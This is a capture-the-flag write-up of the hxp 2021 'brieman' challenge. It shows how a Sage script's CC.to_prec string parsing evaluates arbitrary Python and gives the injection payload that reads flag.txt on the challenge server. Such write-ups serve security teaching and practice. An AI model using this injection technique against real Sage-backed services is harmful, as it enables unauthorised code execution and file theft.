Tags: riemann misc python sage 

Rating: 4.0

The following sage file is given. It appears to want us to find a counterexample to the Riemann
Hypothesis, one of the math problems included in the [Millenium
Prizes](https://www.claymath.org/millennium-problems/riemann-hypothesis). It can surmised we're not
supposed to actually find a counterexample.

#!/usr/bin/env sage
import re

if sys.version_info.major < 3:
print('nope nope nope nope | https://hxp.io/blog/72')

rx = re.compile(r'Dear Bernhard: Your conjecture is false, for ([^ ]{,40}) is a counterexample\.')

s = CC.to_prec(160)(rx.match(input()).groups()[0])

r = round(s.real())
assert not all((s==r, r<0, r%2==0)) # boring

assert not s.real() == 1/2 # boring

assert zeta(s) == 0 # uhm ok

Furthermore, the [link](https://hxp.io/blog/72) printed when Python 2 is detected also gives us a
clue that we may need to look for an arbitrary Python code evaluation sink.

Experimenting with `CC.to_prec(160)` shows that it converts strings to complex fields.

sage: CC.to_prec(160)("1.0")

It appears to perform arithmetic and attempt to resolve Python symbols.

sage: CC.to_prec(160)("1 + 1")
sage: CC.to_prec(160)("A")
/var/tmp/sage-9.4-current/local/lib/python3.9/site-packages/sage/all.py in <module>

NameError: name 'A' is not defined

Attempting some Python code results in it actually executing.

sage: CC.to_prec(160)("print('hello world')")
NaN + NaN*I

Thus, the flag read code can be simply provided to obtain the flag:

$ nc 7904
Dear Bernhard: Your conjecture is false, for print(open('flag.txt').read().strip()) is a counterexample.

**Flag:** `hxp{0NE_M1LL10N_D0LLAR5}`

Full writeup at: [https://nandynarwhals.org/hxp-ctf-2021-brieman/](https://nandynarwhals.org/hxp-ctf-2021-brieman/)

Original writeup (https://nandynarwhals.org/hxp-ctf-2021-brieman/).